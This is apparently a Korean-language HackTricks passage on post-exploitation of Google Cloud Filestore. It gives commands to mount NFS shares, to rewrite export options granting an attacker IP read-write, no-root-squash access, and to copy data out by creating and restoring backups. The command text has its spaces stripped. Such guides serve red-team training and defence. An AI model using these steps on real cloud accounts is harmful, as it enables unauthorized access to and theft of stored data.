공유 파일 시스템에는 공격자의 관점에서 흥미로운 민감한 정보가 포함될 수 있습니다. Filestore에 액세스하여 마운트할 수 있습니다:
sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
공유에 액세스 할 수있는 IP 주소에 공격자가 없지만 수정할 충분한 권한이 있는 경우 제한 사항이나 액세스를 제거할 수 있습니다. 또한 IP 주소에 대해 더 많은 권한을 부여하여 공유에 대한 관리자 액세스를 얻을 수도 있습니다:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
백업 복원
백업이 있다면 기존 인스턴스나 새로운 인스턴스에 복원하여 정보에 접근할 수 있습니다:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
백업 생성 및 복원
만약 공유에 대한 액세스 권한이 없고 수정하고 싶지 않은 경우, 이전에 언급한 대로 백업을 생성하고 복원할 수 있습니다:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!